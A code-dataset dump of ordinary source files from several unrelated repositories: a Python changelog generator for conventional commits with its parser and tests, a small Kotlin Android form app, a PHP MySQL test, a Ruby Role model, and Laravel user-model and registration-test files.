STYLE = 3
CI = 4
REFACTOR = 5
TEST = 6
DOCS = 7
PERF = 8
FIX = 9
FEAT = 10
@dataclass(frozen=True)
class ConventionalCommitFooter:
key: str
value: str
@dataclass(frozen=True, unsafe_hash=True)
class ConventionalCommitMessage:
type: ConventionalCommitType
description: str
breaking: bool
scope: Optional[str]
body: Optional[str]
footers: List[ConventionalCommitFooter]
@dataclass(frozen=True)
class ChangelogLine:
commit_message: ConventionalCommitMessage
commit_sha: str
commit_timestamp: int
commit_date: str = field(init=False)
def __post_init__(self):
object.__setattr__(
self,
"commit_date",
time.strftime("%Y-%m-%d", time.gmtime(self.commit_timestamp)),
) # because frozen=True, we have to use this ugly __setattr__
@dataclass(frozen=True)
class ChangelogEntryForATag:
tag_name: str
tag_timestamp: int
lines_by_type: Dict[ConventionalCommitType, List[ChangelogLine]]
tag_date: str = field(init=False)
def __post_init__(self):
object.__setattr__(
self, "tag_date", time.strftime("%Y-%m-%d", time.gmtime(self.tag_timestamp))
) # because frozen=True, we have to use this ugly __setattr__
<file_sep>/tests/test_parser.py
from ghtc.parser import parse, ConventionalCommitType
MSG1 = """feat: allow provided config object to extend other configs
BREAKING CHANGE: `extends` key in config file is now used for extending other config files
"""
MSG2 = """refactor!: drop support for Node 6"""
MSG3 = """refactor!: drop support for Node 6
BREAKING CHANGE: refactor to use JavaScript features not available in Node 6.
"""
MSG4 = """docs: correct spelling of CHANGELOG"""
MSG5 = """feat(lang): add polish language"""
MSG6 = """fix: correct minor typos in code
see the issue for details
on typos fixed.
Reviewed-by: Z
Refs #133
"""
def test_valid_messages():
msg = parse(MSG1)
assert msg.type == ConventionalCommitType.FEAT
assert msg.breaking
assert msg.body is None
assert msg.scope is None
assert msg.description == "allow provided config object to extend other configs"
assert len(msg.footers) == 1
assert msg.footers[0].key == "BREAKING CHANGE"
assert msg.footers[0].value == (
"`extends` key in config file is now used for extending other config files"
)
msg = parse(MSG2)
assert msg.type == ConventionalCommitType.REFACTOR
assert msg.breaking
assert msg.body is None
assert msg.scope is None
assert msg.description == "drop support for Node 6"
assert len(msg.footers) == 0
msg = parse(MSG3)
assert msg.type == ConventionalCommitType.REFACTOR
assert msg.breaking
assert msg.body is None
assert msg.scope is None
assert msg.description == "drop support for Node 6"
assert len(msg.footers) == 1
assert msg.footers[0].key == "BREAKING CHANGE"
assert msg.footers[0].value == (
"refactor to use JavaScript features not available in Node 6."
)
msg = parse(MSG4)
assert msg.type == ConventionalCommitType.DOCS
assert msg.breaking is False
assert msg.body is None
assert msg.scope is None
assert msg.description == "correct spelling of CHANGELOG"
assert len(msg.footers) == 0
msg = parse(MSG5)
assert msg.type == ConventionalCommitType.FEAT
assert msg.breaking is False
assert msg.body is None
assert msg.scope == "lang"
assert msg.description == "add polish language"
assert len(msg.footers) == 0
msg = parse(MSG6)
assert msg.type == ConventionalCommitType.FIX
assert msg.breaking is False
assert msg.body == "see the issue for details\non typos fixed."
assert msg.scope is None
assert msg.description == "correct minor typos in code"
assert len(msg.footers) == 2
assert msg.footers[0].key == "Reviewed-by"
assert msg.footers[0].value == "Z"
assert msg.footers[1].key == "Refs"
assert msg.footers[1].value == "133"
<file_sep>/Makefile
.PHONY: tests doc clean lint quick_tests
PROJECT=ghtc
lint:
mypy --show-error-codes --ignore-missing-imports $(PROJECT)
flake8 --max-line-length 88 --ignore=D100,D101,D102,D103,D104,D107,D106,D105,W503,E203 $(PROJECT)
black --check $(PROJECT)
tests: lint
export PYTHONPATH=".:${PYTHONPATH}"; pytest
black:
black $(PROJECT)
coverage:
export PYTHONPATH=".:${PYTHONPATH}"; pytest --cov=$(PROJECT) tests/
export PYTHONPATH=".:${PYTHONPATH}"; pytest --cov=$(PROJECT) --cov-report=html tests/
<file_sep>/ghtc/CHANGELOG.md
# {{ TITLE|default("CHANGELOG") }}
{%
set TYPE_MAPPINGS = {
"OTHER": "Other",
"BUILD": "Dev stuff",
"CHORE": "Dev stuff",
"STYLE": "Code style",
"CI": "Continuous Integration",
"REFACTOR": "Refactoring",
"TEST": "Tests",
"DOCS": "Documentation",
"PERF": "Performances",
"FIX": "Bug Fixes",
"FEAT": "New Features"
}
%}
{% for ENTRY_FOR_A_TAG in TAGS|sort(attribute="tag_timestamp", reverse=True) -%}
## {{ ENTRY_FOR_A_TAG.tag_name }}{% if ENTRY_FOR_A_TAG.tag_timestamp != UNRELEASED_TAG_TIMESTAMP %} ({{ ENTRY_FOR_A_TAG.tag_date }}){% endif %}
{% if ENTRY_FOR_A_TAG.lines_by_type|length == 0 -%}
- No interesting change
{% endif -%}
{% for CAT, LINES in ENTRY_FOR_A_TAG.lines_by_type.items()|sort(attribute='0.value', reverse=True) -%}
{% if LINES|length > 0 -%}
### {{ TYPE_MAPPINGS.get(CAT.name, CAT.name) }}
{% for LINE in LINES|sort(attribute='commit_timestamp', reverse=False) -%}
- {{ LINE.commit_message.description }}{% if DEBUG %} { commit_hash: {{LINE.commit_sha}}, commit_date: {{LINE.commit_date}} }{% endif %}
{% endfor %}
{% endif -%}
{% endfor -%}
{% endfor -%}
<file_sep>/CHANGELOG.md
# CHANGELOG
## v0.2.0 (2021-02-12)
### New Features
- add debug mode and fix changelog override
## v0.1.0 (2021-01-25)
### New Features
- add overrides feature (and fixes)
## v0.0.1 (2021-01-13)
### New Features
- we can use git revisions and not only tags
- add better starting_rev default
### Bug Fixes
- fix with empty starting-rev option
- fix issue with first commit
- fix boolean options
<file_sep>/ghtc/overrides.py
from typing import Dict, Optional
import os
import re
from ghtc.models import ConventionalCommitMessage
from ghtc.parser import parse
import mflog
GIT_COMMIT_DELIMITER_REGEX = r"^\[([0-9a-f]{5,40})\]$"
GIT_COMMIT_DELIMITER_COMPILED_REGEX = re.compile(GIT_COMMIT_DELIMITER_REGEX)
LOGGER = mflog.get_logger("ghtc.overrides")
class Overrides:
def __init__(self, path):
self.path = path
self.commits: Dict[str, Optional[ConventionalCommitMessage]] = {}
def parse(self):
if not os.path.isfile(self.path):
return
with open(self.path, "r") as f:
commit: Optional[str] = None
commit_message: Optional[str] = None
for tmp in f.readlines():
line = tmp.strip()
if commit is None and len(line) == 0:
continue
match = GIT_COMMIT_DELIMITER_COMPILED_REGEX.match(line)
if match is None:
if commit is None:
LOGGER.warning("badly formatted overrides file => ignoring")
return False
if commit_message is None:
if len(line) > 0:
commit_message = line
else:
commit_message = commit_message + "\n" + line
else:
if commit is not None:
self.commits[commit] = self._parse(commit, commit_message)
commit = match[1]
commit_message = None
if commit is not None:
self.commits[commit] = self._parse(commit, commit_message)
return True
def _parse(self, commit, commit_message) -> Optional[ConventionalCommitMessage]:
res: Optional[ConventionalCommitMessage] = None
if commit_message is not None:
res = parse(commit_message)
if res is None:
LOGGER.warning(
f"can't parse overriden commit "
f"message for commit: {commit} => ignoring"
)
return res
<file_sep>/requirements.txt
typer
mfutil
GitPython==3.1.14
mflog
<file_sep>/tests/test_overrides.py
import tempfile
import os
from mfutil import get_unique_hexa_identifier
from ghtc.overrides import Overrides
from ghtc.models import ConventionalCommitType
PARSE1 = """
[123456]
feat: this is a test
Close: #456
[aaaaaa]
fix: this is another test
[bbbbbb]
"""
def make_tmp_filepath(content: str):
path = os.path.join(tempfile.gettempdir(), get_unique_hexa_identifier())
with open(path, "w") as f:
f.write(content)
return path
def test_not_found():
x = Overrides("/foo/bar/not_found")
x.parse()
assert len(x.commits) == 0
def test_parse1():
path = make_tmp_filepath(PARSE1)
x = Overrides(path)
x.parse()
assert len(x.commits) == 3
assert x.commits["123456"].type == ConventionalCommitType.FEAT
assert x.commits["123456"].description == "this is a test"
assert x.commits["123456"].footers[0].key == "Close"
assert x.commits["123456"].footers[0].value == "#456"
assert x.commits["aaaaaa"].type == ConventionalCommitType.FIX
assert x.commits["aaaaaa"].description == "this is another test"
assert x.commits["bbbbbb"] is None
os.unlink(path)
<file_sep>/dev-requirements.txt
-r requirements.txt
mypy
flake8
pytest
pytest-cov
black
<file_sep>/ghtc/cli.py
from typing import Any, Dict, List, Optional
from typer import Typer, Argument, Option
from git import Repo
from ghtc.utils import (
get_tags,
get_commits_between,
render_template,
get_reverted_commit,
)
from ghtc.models import (
ChangelogLine,
ChangelogEntryForATag,
ConventionalCommitMessage,
ConventionalCommitType,
UNRELEASED_TAG_TIMESTAMP,
)
from ghtc.parser import parse
from ghtc.overrides import Overrides
app = Typer(add_completion=False)
ALL_TYPES = ", ".join([x.name.lower() for x in ConventionalCommitType])
@app.command()
def cli(
repo_root: str = Argument(..., help="the fullpath to the git repository"),
tags_regex: str = Option(
"^v[0-9]", help="regex to select tags to show on changelog"
),
starting_rev: str = Option(
None,
help="starting revision (if not set latest tag starting with "
"ghtc_changelog_start if exists, else first git commit)",
),
remove_duplicates_entries: bool = Option(
True, help="if True, remove duplicate entries"
),
unreleased: bool = Option(
True, help="if True, add a section about unreleased changes"
),
override_file: str = Option(
".ghtc_overrides.ini", help="the path/name of the 'commit overrides' file"
),
include_type: List[str] = Option(
[],
help="include (only) given conventional types in changelog (can be used "
"multiple times, all types by default), available types: %s" % ALL_TYPES,
),
title: str = "CHANGELOG",
unreleased_title: str = "[Unreleased]",
debug: bool = Option(False, help="add debug values for each changelog entry"),
):
overrides = Overrides(override_file)
overrides.parse()
repo = Repo(repo_root)
previous_tag = starting_rev
context: Dict[str, Any] = {
"TITLE": title,
"UNRELEASED_TAG_TIMESTAMP": UNRELEASED_TAG_TIMESTAMP,
"TAGS": [],
}
tags = get_tags(repo, tags_regex)
if len(include_type) == 0:
# if include_type is empty, we consider we want all types
included_cats = [x.name.lower() for x in list(ConventionalCommitType)]
else:
included_cats = [x.strip().lower() for x in include_type]
if unreleased:
tags.append(None)
for tag in tags:
if tag is None:
tag_name = unreleased_title
tag_date = UNRELEASED_TAG_TIMESTAMP
rev = None
else:
tag_name = tag.name
tag_date = tag.object.authored_date
rev = tag_name
reverted_commits = []
for commit in get_commits_between(repo, previous_tag, rev):
reverted_commit = get_reverted_commit(commit)
if reverted_commit is not None:
reverted_commits.append(reverted_commit)
lines: Dict[ConventionalCommitType, List[ChangelogLine]] = {}
for commit in get_commits_between(repo, previous_tag, rev):
if commit.hexsha in reverted_commits:
continue
msg: Optional[ConventionalCommitMessage] = None
if commit.hexsha in overrides.commits:
msg = overrides.commits[commit.hexsha]
if msg is None:
# ignored message
continue
else:
msg = parse(commit.message)
if msg is None:
continue
cat = msg.type
if cat.name.lower() not in included_cats:
continue
cline = ChangelogLine(msg, commit.hexsha, commit.committed_date)
if cat not in lines:
lines[cat] = []
if remove_duplicates_entries and cline in lines[cat]:
continue
lines[cat].insert(0, cline)
entry = ChangelogEntryForATag(tag_name, tag_date, lines)
if tag is not None or len(lines) > 0:
context["TAGS"].append(entry)
context["DEBUG"] = debug
previous_tag = tag
print(render_template(context))
def main():
app()
if __name__ == "__main__":
main()
<file_sep>/ghtc/utils.py
from typing import List, Optional
import os
import jinja2
from git import Repo, Tag, Commit
import re
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
class TagNotFound(Exception):
pass
def get_tags(repo: Repo, tag_regex: str) -> List[Tag]:
compiled_pattern = re.compile(tag_regex)
res = []
for tag in repo.tags:
if re.match(compiled_pattern, tag.name):
res.append(tag)
return sorted(res, key=lambda x: x.object.authored_date)
def get_first_commit(repo: Repo) -> Commit:
return list(repo.iter_commits(max_parents=0))[0]
def get_commits_between(repo: Repo, rev1: str = None, rev2: str = None) -> List[Commit]:
kwargs = {}
first_commit = None
if rev1 is None or rev1 == "":
tmp_tags = get_tags(repo, "^ghtc_changelog_start")
if len(tmp_tags) >= 1:
tag1_name = tmp_tags[-1]
else:
first_commit = get_first_commit(repo)
tag1_name = first_commit.hexsha
else:
tag1_name = rev1
tag2_name = "HEAD" if rev2 is None or rev2 == "" else rev2
kwargs["rev"] = f"{tag1_name}..{tag2_name}"
tmp = list(repo.iter_commits(**kwargs))
if first_commit is None:
return tmp
# we also include first commit in list
return [first_commit] + tmp
def render_template(context, template_file: str = None) -> str:
if template_file is not None:
template_to_read = template_file
else:
template_to_read = f"{CURRENT_DIR}/CHANGELOG.md"
with open(template_to_read, "r") as f:
content = f.read()
template = jinja2.Template(content)
return template.render(context)
def get_reverted_commit(commit: Commit) -> Optional[str]:
for tmp in commit.message.splitlines():
line = tmp.strip()
if line.startswith("This reverts commit "):
sha = line.replace("This reverts commit ", "").split(".")[0]
if len(sha) >= 40:
return sha
return None
<file_sep>/ghtc/parser.py
from typing import Optional, List, Dict
import re
from ghtc.models import (
ConventionalCommitType,
ConventionalCommitFooter,
ConventionalCommitMessage,
)
TYPE_MAPPINGS: Dict[str, ConventionalCommitType] = {
"feat": ConventionalCommitType.FEAT,
"fix": ConventionalCommitType.FIX,
"build": ConventionalCommitType.BUILD,
"chore": ConventionalCommitType.CHORE,
"ci": ConventionalCommitType.CI,
"docs": ConventionalCommitType.DOCS,
"doc": ConventionalCommitType.DOCS,
"style": ConventionalCommitType.STYLE,
"refactor": ConventionalCommitType.REFACTOR,
"perf": ConventionalCommitType.PERF,
"perfs": ConventionalCommitType.PERF,
"test": ConventionalCommitType.TEST,
"tests": ConventionalCommitType.TEST,
}
TITLE_REGEX = r"^([a-zA-Z0-9_-]+)(!{0,1})(\([a-zA-Z0-9_-]*\)){0,1}(!{0,1}): (.*)$"
TITLE_COMPILED_REGEX = re.compile(TITLE_REGEX)
FOOTER_REGEX1 = r"^([a-zA-Z0-9_-]+): (.*)$"
FOOTER_COMPILED_REGEX1 = re.compile(FOOTER_REGEX1)
FOOTER_REGEX2 = r"^([a-zA-Z0-9_-]+) #(.*)$"
FOOTER_COMPILED_REGEX2 = re.compile(FOOTER_REGEX2)
BREAKING_CHANGE_FOOTER_REGEX = r"^BREAKING[- ]CHANGE: (.*)$"
BREAKING_CHANGE_FOOTER_COMPILED_REGEX = re.compile(BREAKING_CHANGE_FOOTER_REGEX)
def type_string_to_commit_type(type_str: str) -> ConventionalCommitType:
if type_str not in TYPE_MAPPINGS:
return ConventionalCommitType.OTHER
return TYPE_MAPPINGS[type_str]
def parse(commit_message: str) -> Optional[ConventionalCommitMessage]:
if not commit_message:
return None
lines = commit_message.splitlines()
first_line = lines[0]
match = TITLE_COMPILED_REGEX.match(first_line)
if match is None:
return None
type_str = match[1].lower()
breaking = False
if match[2] or match[4]:
breaking = True
scope = None
if match[3]:
scope = match[3].lower()[1:-1]
description = match[5]
body = None
footers: List[ConventionalCommitFooter] = []
if len(lines) > 1 and lines[1] == "":
for line in lines[1:]:
if not line:
continue
tmp1 = FOOTER_COMPILED_REGEX1.match(line)
tmp2 = FOOTER_COMPILED_REGEX2.match(line)
tmp3 = BREAKING_CHANGE_FOOTER_COMPILED_REGEX.match(line)
if len(footers) == 0 and tmp1 is None and tmp2 is None and tmp3 is None:
if body is None:
body = f"{line}"
else:
body += f"\n{line}"
else:
if tmp3 is not None:
breaking = True
footers.append(ConventionalCommitFooter("BREAKING CHANGE", tmp3[1]))
elif tmp1 is not None:
footers.append(ConventionalCommitFooter(tmp1[1], tmp1[2]))
elif tmp2 is not None:
footers.append(ConventionalCommitFooter(tmp2[1], tmp2[2]))
return ConventionalCommitMessage(
type=type_string_to_commit_type(type_str),
scope=scope,
body=body,
footers=footers,
description=description,
breaking=breaking,
)
| eea47658cd6883842ce221f30bd82b3b0c0a3d9f | [
"Markdown",
"Python",
"Makefile",
"Text"
] | 13 | Python | metwork-framework/git_history_to_changelog | ca9e599f3f700faa3f3b5792317a4fffe6865814 | ea775824c512a3aa096f00c0a8053a90a29d3821 |
refs/heads/main | <file_sep>package com.example.multipleactivitiesbonus
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.recyclerview.widget.RecyclerView
import com.example.multipleactivitiesbonus.databinding.ItemRowBinding
/**
 * RecyclerView adapter that renders one text row (item_row.xml via view binding)
 * per String in [info].
 *
 * @param info list of display strings; may be null, which is treated as empty.
 */
class Adapter(private val info: ArrayList<String>?) :
    RecyclerView.Adapter<Adapter.itemViewHolder>() {

    /** Holds the view binding for a single list row. */
    class itemViewHolder(val binding: ItemRowBinding) : RecyclerView.ViewHolder(binding.root)

    override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): itemViewHolder {
        // attachToRoot must be false: RecyclerView attaches row views itself.
        return itemViewHolder(
            ItemRowBinding.inflate(LayoutInflater.from(parent.context), parent, false)
        )
    }

    override fun onBindViewHolder(holder: itemViewHolder, position: Int) {
        // Was `info!![position]`, which throws on a null list even though the
        // constructor declares it nullable. With the safe getItemCount() below,
        // a null list yields 0 items and this bind is never reached; the guard
        // keeps the method crash-free regardless.
        val user = info?.get(position) ?: return
        holder.binding.apply {
            tv3.text = user
        }
    }

    // Was `info!!.size` (NullPointerException on a null list); report 0 instead.
    override fun getItemCount(): Int = info?.size ?: 0
}<file_sep>package com.example.multipleactivitiesbonus
import android.content.DialogInterface
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.widget.Button
import android.widget.TextView
import androidx.appcompat.app.AlertDialog
/**
 * Screen that echoes the details entered on [MainActivity] and asks the user to
 * confirm them via a dialog before forwarding everything to [confirmedActivity].
 */
class confirmationActivity : AppCompatActivity() {
    // Views resolved in onCreate, after setContentView.
    lateinit var tv: TextView
    lateinit var button2: Button
    // The four field values, bundled and forwarded once the user taps "yes".
    lateinit var info: ArrayList<String>

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_confirmation)
        info = arrayListOf()
        tv = findViewById(R.id.tv)

        // getStringExtra() returns null for a missing extra; the previous
        // `.toString()` call turned that into the literal text "null" on screen.
        // Fall back to an empty string instead.
        val name = intent.getStringExtra("name") ?: ""
        val location = intent.getStringExtra("location") ?: ""
        val phone = intent.getStringExtra("phone") ?: ""
        val email = intent.getStringExtra("email") ?: ""

        val infoText = "Name : ${name}\nlocation: ${location} \nphone: ${phone} \nemail: ${email}"
        tv.text = infoText

        button2 = findViewById(R.id.button2)
        button2.setOnClickListener {
            // Show the same details inside a yes-only confirmation dialog.
            val tvAlert = TextView(this)
            tvAlert.text = infoText
            val dialogBuilder = AlertDialog.Builder(this)
            dialogBuilder.setMessage("Are you sure?")
                .setPositiveButton("yes", DialogInterface.OnClickListener { _, _ ->
                    // Only on explicit confirmation: collect the values and
                    // hand them to the next screen as one string list.
                    val intent = Intent(this, confirmedActivity::class.java)
                    info.add(name)
                    info.add(location)
                    info.add(phone)
                    info.add(email)
                    intent.putExtra("info", info)
                    startActivity(intent)
                })
            val alert = dialogBuilder.create()
            alert.setView(tvAlert)
            alert.show()
        }
    }
}<file_sep>package com.example.multipleactivitiesbonus
import android.content.DialogInterface
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.widget.Button
import android.widget.CheckBox
import android.widget.EditText
import android.widget.Toast
import androidx.appcompat.app.AlertDialog
class MainActivity : AppCompatActivity() {
// Form widgets; all are bound once in onCreate.
lateinit var name: EditText
lateinit var location: EditText
lateinit var phone: EditText
lateinit var email: EditText
lateinit var cb: CheckBox
lateinit var button: Button
// Entry form: collects the four text fields, requires the checkbox to be
// ticked, then forwards everything to confirmationActivity.
override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    setContentView(R.layout.activity_main)
    // Bind the form widgets declared above.
    name = findViewById(R.id.name)
    location = findViewById(R.id.location)
    phone = findViewById(R.id.phone)
    email = findViewById(R.id.email)
    cb = findViewById(R.id.checkBox)
    button = findViewById(R.id.button)
    button.setOnClickListener {
        // Guard 1: every field must contain something.
        val fields = listOf(name, location, phone, email)
        if (fields.any { it.text.toString() == "" }) {
            Toast.makeText(this, "All fields must be filled", Toast.LENGTH_LONG).show()
            return@setOnClickListener
        }
        // Guard 2: the checkbox must be ticked.
        if (!cb.isChecked) {
            val dialogBuilder = AlertDialog.Builder(this)
            dialogBuilder.setMessage("please check the box")
                .setPositiveButton("OK", DialogInterface.OnClickListener { _, _ ->
                })
            dialogBuilder.create().show()
            return@setOnClickListener
        }
        // Everything filled and confirmed: hand the values to the confirmation screen.
        val intent = Intent(this, confirmationActivity::class.java)
        intent.putExtra("name", name.text.toString())
        intent.putExtra("location", location.text.toString())
        intent.putExtra("phone", phone.text.toString())
        intent.putExtra("email", email.text.toString())
        startActivity(intent)
    }
}
}<file_sep>package com.example.multipleactivitiesbonus
import android.annotation.SuppressLint
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.view.Menu
import android.view.MenuItem
import androidx.recyclerview.widget.LinearLayoutManager
import androidx.recyclerview.widget.RecyclerView
class confirmedActivity : AppCompatActivity() {
// Recycler view showing the confirmed values, and its adapter.
lateinit var rv:RecyclerView
lateinit var adapter:Adapter
// Displays the list of values forwarded from confirmationActivity.
override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    setContentView(R.layout.activity_confirmed)
    // List packed into the "info" extra by the previous screen (null if absent).
    val info = intent.extras?.getStringArrayList("info")
    rv = findViewById(R.id.rv)
    adapter = Adapter(info)
    // FIX: the original attached a second, freshly created Adapter(info) and left
    // the `adapter` field dangling; attach the instance we just stored instead.
    rv.adapter = adapter
    rv.layoutManager = LinearLayoutManager(this)
}
// Inflate the overflow menu (home / exit entries).
override fun onCreateOptionsMenu(menu: Menu?): Boolean {
    menuInflater.inflate(R.menu.main_menu, menu)
    return true
}
@SuppressLint("RestrictedApi")
// Handles the two menu actions: jump back to the entry form, or terminate the app.
override fun onOptionsItemSelected(item: MenuItem): Boolean {
    when(item.itemId){
        R.id.home -> {
            // Relaunch the main form.
            // NOTE(review): confirm this app-local R.id.home does not shadow
            // android.R.id.home (the action-bar "up" button id).
            val intent = Intent(this , MainActivity::class.java)
            startActivity(intent)
            return true
        }
        R.id.exit -> {
            // Forceful shutdown: background the task, kill the process, then exit.
            // NOTE(review): exit code 1 conventionally signals abnormal termination,
            // and killProcess is a heavy-handed way to close an app — verify intent.
            moveTaskToBack(true)
            android.os.Process.killProcess(android.os.Process.myPid())
            System.exit(1)
            return true
        }
    }
    return super.onOptionsItemSelected(item)
}
} | 78998ebe38acffb1f1fa3d7082b19a805a16f3a2 | [
"Kotlin"
] | 4 | Kotlin | Amal001001/Multiple-Activities--Bonus- | 005e87fe1ba5e576cffac2ebf65fb190308f8a36 | 9f1a5e254223e945846cc58e8c45cd247bba4fa3 |
refs/heads/master | <file_sep><?php
/**
* @author ngyuki
*/
class SampleTest extends \PHPUnit\Framework\TestCase
{
    /**
     * Round-trips a single row through MySQL using connection details taken
     * from the MYSQL_* environment variables.
     *
     * @test
     */
    public function test()
    {
        $host = getenv('MYSQL_HOST');
        $port = getenv('MYSQL_PORT');
        $dbname = getenv('MYSQL_DATABASE');
        $user = getenv('MYSQL_USER');
        $pass = getenv('MYSQL_PASSWORD');
        // ERRMODE_EXCEPTION makes every failed statement throw instead of
        // silently returning false.
        $pdo = new PDO("mysql:dbname=$dbname;host=$host;port=$port;charset=utf8", $user, $pass,
            [
                PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION
            ]
        );
        // exec() is the appropriate call for statements with no result set.
        $pdo->exec('drop table if exists t');
        $pdo->exec('create table t (id int not null primary key)');
        $pdo->exec('insert into t values (123)');
        $val = $pdo->query('select * from t')->fetchColumn();
        // FIX: assertEquals takes (expected, actual); the original swapped the
        // arguments, which yields misleading failure diagnostics.
        $this->assertEquals(123, $val);
    }
}
| fbbf946c548f5559b340801b5fa478856f2f7499 | [
"PHP"
] | 1 | PHP | ngyuki-sandbox/travis-sandbox | 4a90cf60b81e6033f24a6c663b8c96abf99ef3cb | c029ab59ae9d42148937b66f216971f67a525c96 |
refs/heads/master | <repo_name>sanrodari/users_gem<file_sep>/app/models/role.rb
# Named role that can be granted to many users (HABTM join table).
class Role < ActiveRecord::Base
  # NOTE(review): attr_accessible is the Rails <= 3 mass-assignment whitelist;
  # Rails 4+ replaced it with strong parameters — confirm the Rails version.
  attr_accessible :name, :description
  validates :name, presence: true, length: { maximum: 50 }
  has_and_belongs_to_many :users
end
| 00e8f99cd04e349145e8198be10ecbb9742773ee | [
"Ruby"
] | 1 | Ruby | sanrodari/users_gem | a499d2f4f7f11b2f1753a994aafc3facd9fb81f8 | 541372b374e57af75308425fca45f6e9b63cc97f |
refs/heads/master | <repo_name>VBetsun/doit-mailer<file_sep>/app/Models/User.php
<?php
declare(strict_types=1);
namespace App\Models;
use Illuminate\Database\Eloquent\Relations\HasMany;
use Illuminate\Database\Eloquent\SoftDeletes;
use Illuminate\Notifications\Notifiable;
use Illuminate\Foundation\Auth\User as Authenticatable;
/**
* Class User
* @package App\Models
* @property int $id
* @property string $email
* @property string $password
* @property string $api_token
* @property \Carbon\Carbon|null $deleted_at
* @property \Carbon\Carbon|null $updated_at
* @property \Carbon\Carbon|null $created_at
* @property \Illuminate\Database\Eloquent\Collection|\App\Models\UserAvatar[] $avatars
* @property \Illuminate\Database\Eloquent\Collection|\App\Models\UserAvatar[] $thumbnails
* @mixin \Eloquent
*/
class User extends Authenticatable
{
    use Notifiable, SoftDeletes;

    /**
     * Assign a fresh random API token to every user at creation time.
     */
    public static function boot()
    {
        parent::boot();
        static::creating(function ($model) {
            $model->attributes['api_token'] = static::generateToken();
        });
    }

    /**
     * The attributes that are mass assignable.
     *
     * @var array
     */
    protected $fillable = [
        'email',
        'password'
    ];

    /**
     * The attributes that should be hidden for arrays.
     *
     * @var array
     */
    protected $hidden = [
        'password',
        'api_token',
        'deleted_at',
        'updated_at',
        'created_at'
    ];

    /**
     * Full-size avatars, newest first.
     *
     * @return HasMany
     */
    public function avatars(): HasMany
    {
        return $this->hasMany(UserAvatar::class)
            ->where('type', '=', UserAvatar::TYPE_MAIN)
            ->orderBy('created_at', 'DESC')
        ;
    }

    /**
     * Avatar thumbnails, newest first.
     *
     * @return HasMany
     */
    public function thumbnails(): HasMany
    {
        return $this->hasMany(UserAvatar::class)
            ->where('type', '=', UserAvatar::TYPE_THUMBNAIL)
            ->orderBy('created_at', 'DESC')
        ;
    }

    /**
     * Absolute URL of the newest full-size avatar, or the bundled default.
     *
     * @return string
     */
    public function getAvatar(): string
    {
        $link = 'default.png';
        if ($this->avatars->isNotEmpty()) {
            // FIX: read from the already-loaded relation collection instead of
            // $this->avatars()->first(), which issued a redundant second query.
            $image = $this->avatars->first();
            $link = $image->path . $image->name;
        }
        return sprintf('%s/storage/%s', config('app.url'), $link);
    }

    /**
     * Absolute URL of the newest avatar thumbnail, or the bundled default.
     *
     * @return string
     */
    public function getAvatarThumbnail(): string
    {
        $link = 'default-thumbnail.png';
        if ($this->thumbnails->isNotEmpty()) {
            // FIX: same redundant-query pattern as getAvatar().
            $image = $this->thumbnails->first();
            $link = $image->path . $image->name;
        }
        return sprintf('%s/storage/%s', config('app.url'), $link);
    }

    /**
     * Random 60-character API token.
     * NOTE(review): str_random() was removed in Laravel 6; use Str::random()
     * if the framework is ever upgraded.
     *
     * @return string
     */
    private static function generateToken(): string
    {
        return str_random(60);
    }
}
<file_sep>/app/Providers/GithubUsersServiceProvider.php
<?php
declare(strict_types=1);
namespace App\Providers;
use App\Handlers\GithubUsersHandler;
use Illuminate\Support\ServiceProvider;
/**
* Class GithubUsersServiceProvider
* @package App\Providers
*/
class GithubUsersServiceProvider extends ServiceProvider
{
    /**
     * Indicates if loading of the provider is deferred.
     * NOTE(review): the $defer flag is honoured up to Laravel 5.7; 5.8+
     * expects the DeferrableProvider interface — confirm the framework version.
     *
     * @var bool
     */
    protected $defer = true;
    /**
     * Register services.
     *
     * Binds GithubUsersHandler so callers can resolve it with a
     * ['usernames' => [...]] parameter array (see MailController).
     *
     * @return void
     */
    public function register()
    {
        $this->app->singleton(GithubUsersHandler::class, function ($app, $params) {
            return new GithubUsersHandler($params['usernames']);
        });
    }
    /**
     * Get the services provided by the provider.
     *
     * @return array
     */
    public function provides()
    {
        return [GithubUsersHandler::class];
    }
}
<file_sep>/tests/Feature/RegisterTest.php
<?php
declare(strict_types=1);
namespace Tests\Feature\Common;
use Tests\TestCase;
/**
* Class RegisterTest
* @package Tests\Feature\Common
*/
class RegisterTest extends TestCase
{
    // Endpoint under test.
    private $url = '/api/v1/register';
    // Top-level keys every successful registration response must contain.
    private const CORRECT_RESPONSE_STRUCTURE = [
        'id',
        'email',
        'token',
        'avatar',
    ];
    // Happy path: valid credentials create a user and return the full payload.
    public function testCorrectRegister()
    {
        $email = '<EMAIL>';
        $body = [
            'email' => $email,
            'password' => '<PASSWORD>'
        ];
        $response = $this->json('POST', $this->url, $body);
        $response->assertStatus(201)
            ->assertJsonStructure(static::CORRECT_RESPONSE_STRUCTURE)
        ;
        $this->assertDatabaseHas('users', compact('email'));
    }
    // A malformed email address must be rejected with a 422 validation error.
    public function testRestrictRegisterWithNotValidEmail()
    {
        $body = [
            'email' => $this->getInvalidField(),
            'password' => '<PASSWORD>'
        ];
        $response = $this->json('POST', $this->url, $body);
        $response->assertStatus(422)
            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'email' => ['The email must be a valid email address.']
                ],
                'status' => 422,
            ])
        ;
    }
    // Registering an email already present (seeded admin) must fail with 422.
    public function testRestrictRegisterWithExistedEmail()
    {
        $body = [
            'email' => '<EMAIL>',
            'password' => '<PASSWORD>'
        ];
        $response = $this->json('POST', $this->url, $body);
        $response->assertStatus(422)
            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'email' => ['The email has already been taken.']
                ],
                'status' => 422,
            ])
        ;
    }
    // Both fields empty: both "required" rules must fire.
    public function testRestrictRegisterWithEmptyData()
    {
        $body = [
            'email' => $this->getEmptyField(),
            'password' => $this->getEmptyField()
        ];
        $response = $this->json('POST', $this->url, $body);
        $response->assertStatus(422)
